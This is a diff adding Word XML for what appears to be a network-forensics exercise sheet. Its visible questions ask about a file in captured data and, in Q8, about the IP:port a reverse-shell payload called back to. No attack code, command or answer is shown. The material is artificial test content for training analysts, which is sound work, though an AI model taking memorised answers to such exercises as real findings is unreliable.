+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>file</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>from</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>captured</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>data</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Top of Form</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Bottom of Form</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Q8</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>After</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>attacker</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>established</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>reverse</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>shell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>on</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>our</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>server</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>payload</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>connects</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>back</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>attacker's</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>machine</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>From</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>analysis</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>what</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>is</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>callback</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>destination</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>IP:port</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>format</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId12" w:history="1"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -414,6 +5090,297 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="2BB505A8"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="6B063A00"/>
+    <w:lvl w:ilvl="0" w:tplc="042A000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="042A0019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="042A001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="042A000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="042A0019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="042A001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="042A000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="042A0019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="042A001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="333C383C"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="41EE95D8"/>
+    <w:lvl w:ilvl="0" w:tplc="20BC3A12">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="-"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="042A0003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="042A0005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="042A0001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="042A0003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="042A0005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="042A0001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="042A0003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="042A0005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="38B713B5"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="2B12A80C"/>
+    <w:lvl w:ilvl="0" w:tplc="042A000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="042A0019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="042A001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="042A000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="042A0019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="042A001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="042A000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="042A0019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="042A001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
